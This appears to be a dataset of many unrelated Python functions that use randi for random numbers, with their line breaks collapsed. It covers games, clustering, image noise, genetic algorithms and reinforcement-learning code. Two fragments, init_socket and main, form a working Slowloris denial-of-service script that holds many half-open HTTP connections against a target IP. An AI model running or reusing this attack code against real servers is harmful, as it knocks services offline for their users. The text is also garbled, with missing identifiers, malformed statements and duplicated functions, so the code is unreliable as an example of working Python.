def generate_task(m, n, c, a): c = [randi(1, 10) for i in range(n)] a = [[]] * m for i in range(len(a)): a[i] = [randi(1, 10) for i in range(n)] b = [round(sum(_a) / 3, 1) for _a in a] return (c, a, b)
def gen_query(n, q): qList = [] for i in range(q): mode = randi(1, 2) u, v = randi(1, n), randi(1, n) qList.append((mode, u, v)) return qList
def takeNaiveMove(): """ Returns a tile number randomly from the set of unchecked tiles with uniform probability distribution. """ mv=randi(1,9) while(validmove(mv)==False): mv=randi(1,9) return mv
def gen_tree(n): edges = [] for i in range(2, n + 1): edges.append((i, randi(1, i - 1), randi(1, max_capacity))) shuffle(edges) return edges
def RNG(guess1, guess2, guess3): count = 0 if guess1 == randi(1, 6): count += 1 if guess2 == randi(1, 6): count += 1 if guess3 == randi(1, 6): count += 1 print("You got ", count, "guess(es) right")
def make_food(self): food_in_snake = True while food_in_snake: = [ randi(0, (self.board_size / self.cell_size) - 1) * self.cell_size, randi(0, (self.board_size / self.cell_size) - 1) * self.cell_size ] if not in self.cells: food_in_snake = False return pygame.draw.rect( self.game_window, red, [[0],[1], self.cell_size, self.cell_size])
def get_centroids(centroids, n_clusters, img): for i in range(n_clusters): x = randi(0, img.shape[0] - 1) y = randi(0, img.shape[1] - 1) l = float(img[x, y, 0]) a = float(img[x, y, 1]) b = float(img[x, y, 2]) centroids[i, 0] = l centroids[i, 1] = a centroids[i, 2] = b return centroids
def randomwalk(n, size): pen = turtle.Turtle() pen.shape('turtle') pen.pensize(3) w_pos = 0 w_edge = n // 2 h_pos = 0 h_edge = n // 2 while -w_edge <= w_pos <= w_edge and -h_edge <= h_pos <= h_edge: where = randi(1, 4) if where == 1: pen.setheading(0) w_pos += 1 elif where == 2: pen.setheading(90) h_pos += 1 elif where == 3: pen.setheading(180) w_pos -= 1 else: pen.setheading(270) h_pos -= 1 pen.forward(size)
def Visualize(x_train): for i in range(5): obj = x_train[randi(0, x_train.shape[0]-1)] Image = np.reshape(obj, (32, 32, 3)) cv2.imwrite("./Q4-output/orig_"+str(i)+".png", Image) # cv2.imwrite("./Q4-output/original.png", Image) # fd, _ = hog(Image, orientations=8, pixels_per_cell=(4, 4), cells_per_block=(1, 1), visualize=True, multichannel=True, block_norm="L2-Hys") fd, hogimg = hog(Image, visualize=True, multichannel=True, block_norm="L2-Hys") plt.figure() n, bins, patches = plt.hist(x=fd, bins='auto', color='#0504aa', alpha=0.7, rwidth=0.85) plt.grid(axis='y', alpha=0.75) plt.xlabel('File Descriptor count') plt.ylabel('Frequency') plt.title('Histogram of Gradients') plt.savefig("./Q4-output/hoghist_"+str(i)+".png") cv2.imwrite("./Q4-output/hog_"+str(i)+".png", hogimg) Image = cv2.cvtColor(Image, cv2.COLOR_BGR2GRAY) lbp = local_binary_pattern(Image, 12, 3) # cv2.imwrite("./Q4-output/lbp1.png", lbp) histo, lbpigm = np.histogram(lbp.ravel(), bins=np.arange(0, 12 + 3), range=(0, 3 + 2)) cv2.imwrite("./Q4-output/lbp_"+str(i)+".png", lbp) plt.figure() n, bins, patches = plt.hist(x=histo, bins='auto', color='#0504aa', alpha=0.7, rwidth=0.85) plt.grid(axis='y', alpha=0.75) plt.xlabel('Texture Range') plt.ylabel('Frequency') plt.title('Histogram of Texture') plt.savefig("./Q4-output/lbphist_"+str(i)+".png")
def distant(lst): R, C = np.shape(lst) farthest=lambda one,rest: sorted(rest, key=lambda F: aDist(F,one))[-1] one=lst[randi(0,R-1)] mid=farthest(one, lst) two=farthest(mid, lst) return one, two
def create_noise_audio(audio): noise = noise_data[randi(0, 5)] if (len(audio) > len(noise)): noise_audio = audio[:len(noise)] + 0.1 * noise return noise_audio else: noise_audio = audio + 0.1 * noise[:len(audio)] return noise_audio
def randomPopulation(self): for i in range(self.N): for j in range(i + 1, self.N): z = randi(1, self.N * 10) self.Crr.append((i, j, z)) print("Crr: ", self.Crr) self.ShowGraph(self.G, self.Crr)
def distant(lst): R, C = np.shape(lst) farthest = lambda one, rest: sorted(rest, key=lambda F: aDist(F, one))[ -1] one = lst[randi(0, R - 1)] mid = farthest(one, lst) two = farthest(mid, lst) return one, two
def init_socket(ip): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) s.connect((ip, args.p)) s.send("GET /?{} HTTP/1.1\r\n".format(randi(0, 2000)).encode("utf-8")) s.send("User-Agent: {}\r\n".format(choice(user_agent)).encode("utf-8")) s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) return s
def SaltAndPepperNoise(image, Percentage): Pixels = (image.shape[0] * image.shape[1] * Percentage) // 100 # print(Pixels, image.shape[0]*image.shape[1]) pairs = [] i = 0 Result = np.copy(image) while i < Pixels: x = randi(0, image.shape[0] - 1) y = randi(0, image.shape[1] - 1) z = randi(0, 255) if (x, y) not in pairs: Result[x, y] = z pairs.append((x, y)) else: continue i += 1 return Result
def gen_fake_expert_traj(grid, value_func, no_of_fake_traj, add_state_itself=0, traj_length_limits=(100, 100)): from random import randint as randi import operator all_traj = [] for traj_idx in range(no_of_fake_traj): # starting point of each trajectory is random curr_point = (randi(0, grid.grid_dims['rows'] - 1), randi(0, grid.grid_dims['cols'] - 1)) # length of traj is random, between the limits specified in the argument traj_length_limits traj_length = randi(traj_length_limits[0], traj_length_limits[1]) curr_traj = [] # we keep on appending the next point with highest value amongst it's neighbours # TODO this might lead to stupid trajectories that keep on looping for pt_idx in range(traj_length): curr_traj.append(curr_point) # get the neighbours of curr_point successor_states = grid.get_children(curr_point) # add curr point to stop if add_state_itself: successor_states.append(curr_point) # get value for each neighbouring states successor_values = map(lambda x: grid.get_reward_at_point(x), successor_states) # find max value. not we need the index of the neifghbouring states max_index, max_value = max(enumerate(successor_values), key=operator.itemgetter(1)) # print "successor_values", successor_values # print "max_index", max_index, "max_value", max_value, "\n" curr_point = successor_states[max_index] successor_states, successor_values, max_value, max_index = ( [] for i in range(4)) # print curr_point, max_value all_traj.append(curr_traj) return all_traj
def GenCoinToss(n): s = '' for k in range(n): i = randi(0, 1) if i == 0: s = s + 'H' else: s += 'T' return s
def RandString(m): """ Returns a length-m string consisting of lower case letters. PreC: m is a positive integer. """ letters = 'abcdefghijklmnopqrstuvwxyz' w = '' for i in range(m): w = w + letters[randi(0,25)] return w
def init_field(self): field = matrix(EMPTINESS, self.width, self.height) self.image = matrix(EMPTINESS, self.width, self.height) free_space = [[i, j] for i in range(self.width) for j in range(self.height)] tmp_counter = self.humans_count self.humans = [] for party in range(self.parties): count = int( clamp( math.ceil(self.parties_data[party]['fraction'] * self.humans_count), 0, tmp_counter)) self.party_counts.append(count) tmp_counter -= count for humans in range(count): [x, y] = free_space.pop(randi(0, len(free_space) - 1)) human = { 'party': party + 1, 'influence': inverse_power(self.alpha_influence, random.random()), # 'conviction': inverse_power(self.alpha_conviction, random.random()), 'conviction': inverse_norm(self.mean_conviction, self.stdev_conviction, random.random()), 'position': [x, y] } self.humans.append(human) field[y][x] = human self.image[y][x] = party + 1 for human in self.humans: [x, y] = human['position'] minx = max(x - self.r, 0) maxx = min(x + self.r + 1, len(field[0])) miny = max(y - self.r, 0) maxy = min(y + self.r + 1, len(field)) human['neighbourhood'] = [] for j in range(miny, maxy): for i in range(minx, maxx): neighbour = field[j][i] if neighbour and not (x == i and y == j): human['neighbourhood'].append(neighbour)
def new_stone(self): shape = tetris_shapes[randi(0, 6)] pos = Position(2, 0) dir = Direction(0, 0, 0) if self.check_collision(shape, pos, dir): self.game_over = True return self.stone = shape self.stone_pos = pos self.stone_dir = dir
def __init__(self): self.width = WIDTH self.height = HEIGHT self.speed = SPEED self.cstep = 0 self.state = np.zeros((self.height, self.width), np.uint8) self.nomove = False self.reward = 0 self.points = 0 self.tmppts = 0 self.stone = tetris_shapes[randi(0, 6)] self.stone_pos = Position(math.ceil(self.width/2) - 2, 0) self.stone_dir = Direction(0, 0, 0) self.game_over = False
def takeNaiveMove(): """ Returns a tile number randomly from the set of unchecked tiles with uniform probability distribution. """ from random import randint as randi import tile try: s = randi(1, 9) if validmove(s): if s == 1: tile.tile1 = tile.turn return True #win() elif s == 2: tile.tile2 = tile.turn return True #win() elif s == 3: tile.tile3 = tile.turn return True #win() elif s == 4: tile.tile4 = tile.turn return True #win() elif s == 5: tile.tile5 = tile.turn return True #win() elif s == 6: tile.tile6 = tile.turn return True #win() elif s == 7: tile.tile7 = tile.turn return True #win() elif s == 8: tile.tile8 = tile.turn return True #win() elif s == 9: return True tile.tile9 = tile.turn #win() else: return False #takeNaiveMove() except RecursionError: pass
def getSequence(self): states = [] rewards = [] curState = 2 while (curState != 5) and (curState != -1): nextState = curState - 1 if randi(1, 2) == 1 else curState + 1 curReward = 1 if (nextState == 5) else 0 states.append(curState) rewards.append(curReward) curState = nextState assert (len(rewards) == len(states)) return states, rewards
def Jumble(self): newGenes = [] for i in range(len(self.Genes)): opt = randi(0, 2) if (opt == 0): newGenes.append( Gene(self.Genes[i].Course, self.Genes[i].Professor, randi(0, 1), self.Genes[i].Day, self.Genes[i].Slot)) elif (opt == 1): newGenes.append( Gene(self.Genes[i].Course, self.Genes[i].Professor, self.Genes[i].Room, randi(0, 4), self.Genes[i].Slot)) else: newGenes.append( Gene(self.Genes[i].Course, self.Genes[i].Professor, self.Genes[i].Room, self.Genes[i].Day, randi(0, 7))) # if ( Genes[i].Room == 0 ): # newGenes.append(Gene(Genes[i].Course, Genes[i].Professor, 1, randi(0, 4), randi(0, 7))) # else: # newGenes.append(Gene(Genes[i].Course, Genes[i].Professor, 0, randi(0, 4), randi(0, 7))) ch = Chromosome(newGenes, self.RoomCount, self.DaysCount, self.TimeSlotsCount) return ch
def recurse(dataset): R, C = np.shape(dataset) # No. of Rows and Col # Find the two most distance points. one = dataset[randi(0, R - 1)] mid = farthest(one, dataset) two = farthest(mid, dataset) # Project each case on def proj(test): a = aDist(one, test) b = aDist(two, test) c = aDist(one, two) return (a**2 - b**2 + c**2) / (2 * c) if R < np.sqrt(N): clusters.append(dataset) else: _ = recurse(sorted(dataset, key=lambda F: proj(F))[:int(R / 2)]) _ = recurse(sorted(dataset, key=lambda F: proj(F))[int(R / 2):])
def recurse(dataset): R, C = np.shape(dataset) # No. of Rows and Col # Find the two most distance points. one=dataset[randi(0,R-1)] mid=farthest(one, dataset) two=farthest(mid, dataset) # Project each case on def proj(test): a = aDist(one, test) b = aDist(two, test) c = aDist(one, two) return (a**2-b**2+c**2)/(2*c) if R<np.sqrt(N): clusters.append(dataset) else: _ = recurse(sorted(dataset,key=lambda F:proj(F))[:int(R/2)]) _ = recurse(sorted(dataset,key=lambda F:proj(F))[int(R/2):])
def localOptimisation(self, Pop): newPop = [] for i in range(self.PopulationCount): chromo = Pop[i] couDay = {} for j in range(len(chromo.Genes)): if (chromo.Genes[j].Course.getCourseCode() not in couDay): couDay[chromo.Genes[j].Course.getCourseCode()] = [ chromo.Genes[j].Day ] else: arr = couDay[chromo.Genes[j].Course.getCourseCode()] if chromo.Genes[j].Day in arr: ni = randi(0, 4) chromo.Genes[j].Day = ni else: couDay[chromo.Genes[j].Course.getCourseCode()].append( chromo.Genes[j].Day) newPop.append(chromo) return newPop
def main(): ip = socket_nr = args.sockets"Attacking %s with %s sockets.", ip, socket_nr) for socketnum in range(socket_nr): logging.debug("Creating socket nr %s", socketnum) s = init_socket(ip) socket_list.append(s) while True: try:"Keeping alive sockets (Socket number: %s)", len(socket_list)) for socketi in list(socket_list): try: socketi.send("X-a: {}\r\n".format(randi( 1, 5000)).encode("utf-8")) except socket.error: socket_list.remove(socketi) for socketn in range(socket_nr - len(socket_list)): logging.debug("Recreating socket...") try: s = init_socket(ip) if s: socket_list.append(socketn) except socket.error as e: logging.debug(e) break logging.debug("Sleeping for %d seconds", args.sleeptime) sleep(args.sleeptime) except (KeyboardInterrupt, SystemExit):"Stopping SlowLoris") break
def __iter__(self): if is True: rand_perm = npr.permutation(self.seq_num) else: rand_perm = np.arange(self.seq_num) shuffled_seq_start_end = self.seq_start_end[rand_perm,:] scale_inds = np.random.randint( 0, high=len(cfg.TRAIN.SCALES), size=self.seq_num) #randomly sample from sequence. idx_list = [] scale_list = [] for idx in range(self.seq_num): cur_se = shuffled_seq_start_end[idx,:] assert(cur_se[1] > cur_se[0]) length = cur_se[1] - cur_se[0] if length<self.batch_size: #raise ValueError('length of the sequence is shorter than self.batch_size.') #print(self.batch_size,'>',length) #raise ValueError('length of the sequence is shorter than self.batch_size, please modify batch_size to fit sequence length.') print('length of the sequence is shorter than self.batch_size, please modify batch_size to fit sequence length.') batch_size = length else: batch_size = self.batch_size if is True: id_start = randi(0, length-batch_size)+int(cur_se[0]) id_end = id_start+batch_size else: id_start = 0 id_end = length assert id_start>=int(cur_se[0]) and id_end<=int(cur_se[1]), print(id_start, id_end, cur_se[:]) idx_list.extend([id_start]*(self.batch_size-batch_size)+list(range(id_start, id_end))) scale_list.extend([cfg.TRAIN.SCALES[scale_inds[idx]]]*(self.batch_size)) assert len(idx_list)==len(scale_list), print(len(idx_list), len(scale_list)) assert len(idx_list)==self.batch_size*self.seq_num, print(len(idx_list), self.batch_size*self.seq_num) return iter(zip(idx_list, scale_list))
def InitialPopulation(self): Population = [] for i in range(self.PopulationCount): arr = [] for j in range(32): if (j < 16): for k in range(3): arr.append( Gene( self.Courses[j], self.Professors[int( self.Courses[j].getProfessorID())], randi(0, 1), randi(0, 4), randi(0, 7))) else: for k in range(2): arr.append( Gene( self.Courses[j], self.Professors[int( self.Courses[j].getProfessorID())], randi(0, 1), randi(0, 4), randi(0, 7))) Population.append( Chromosome(arr, self.Rooms, self.Days, len(self.TimeSlots))) return Population
def new(self): # Creates a new random instance return [randi(d[0], d[1]) for d in self.model.indep()]
def draw(self): return min(randi(1,13), 10) #J,Q,K are treated as face cards with value 10
def getRandomAction(self): return "hit" if randi(1,2) == 1 else "stick"
a1 = rand()-.5 b1 = rand()-.5 c1 = rand()-.5 a3 = rand()-.5 b3= -rand()-.5 c3 = rand()-.5 a4 = rand()-.5 b4= -rand()-.5 c4 = rand()-.5 d4=2 num_correct=0 for j in range(0,200): # optimal net# random initial parameters # a1 = Math.random() - 0.5; # a random number between -0.5 and 0.5 # ... similarly initialize all other parameters to randoms # pick a random data point i = randi(len(data)) x = data[i][0]; y = data[i][1]; label = labels[i]; # compute forward pass n1 = max(0, a1*x + b1*y + c1); # activation of 1st hidden neuron n2 = max(0, a2*x + b2*y + c2); # 2nd neuron n3 = max(0, a3*x + b3*y + c3); # 3rd neuron score = a4*n1 + b4*n2 + c4*n3 + d4; # the score error=abs(score-label) error2=error*error # // compute pull
def generate(self): self.policy = PolicyGreedy() for gameNumber in range(self.NUM_GAMES): print("Running game number:", str(gameNumber + 1), "out of", self.NUM_GAMES, "\t", end="\r") blackjack = Blackjack() # Generate episode states = [] actions = [] rewards = [None] # Rewards start form time step = 1. Hence insert dummy R_0 # Exploring starts blackjack.forceInitialState(self.getRandomState()) currentState = blackjack.getInitialState() currentAction = self.getRandomAction() states.append(currentState) actions.append(currentAction) # Generate episode terminal = False while not terminal: terminal, reward, nextState = blackjack.step(currentAction) rewards.append(reward) states.append(nextState) if(not terminal): nextAction = self.policy.getAction(nextState) else: nextAction = None actions.append(nextAction) currentState = nextState currentAction = nextAction assert(len(states) == len(rewards) and len(states) == len(actions)) # Store the index of first occurance of states for first visit MC firstVisitIdx = {} time = 0 for s, a in zip(states, actions): if((s,a) not in firstVisitIdx): firstVisitIdx[(s, a)] = time time += 1 if(a != None and (s,a) not in self.totalStateActionValue): self.totalStateActionValue[(s,a)] = 0 self.totalStateActionCount[(s,a)] = 0 # Estimate State Action Values G = 0 T = len(rewards) - 2 # Index of last timestep for t in range(T, -1, -1): G += rewards[t+1] St = states[t] At = actions[t] if(firstVisitIdx[(St, At)] == t): # First Visit MC self.totalStateActionValue[(St, At)] += G self.totalStateActionCount[(St, At)] += 1 # Take average and get Q values Q = {} for (s,a) in self.totalStateActionValue: # Take avg Q[(s,a)] = self.totalStateActionValue[(s,a)] / self.totalStateActionCount[(s,a)] for (s,a) in Q: if(a == "hit"): if((s,"stick") in Q): # Both actions present # Take argmax and break ties randomly if(Q[(s, "hit")] > Q[(s, "stick")]): self.policy.setAction(s, "hit") elif(Q[(s, "hit")] < Q[(s, "stick")]): self.policy.setAction(s, "stick") else: self.policy.setAction(s, "hit" if randi(1,2) == 1 else "stick") else: # Only hit present self.policy.setAction(s, "hit") else: if((s,"hit") not in Q): # Only stick present self.policy.setAction(s, "stick") self.generateStateValue() print()